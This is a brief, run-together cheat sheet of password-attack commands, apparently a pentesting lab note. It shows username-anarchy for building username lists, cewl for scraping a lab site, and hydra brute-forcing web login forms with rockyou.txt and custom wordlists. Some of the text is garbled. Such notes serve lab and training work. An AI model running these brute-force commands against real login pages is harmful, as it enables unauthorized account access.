πPassword Attacks
Username Custom Wordlist
ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.firstBruteforcing WebApps
cewl http://postfish.off/team.html -m 5 -w team.txt hydra -l user -P /usr/share/wordlists/rockyou.txt <o[> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^JohnTheRipper
Last updated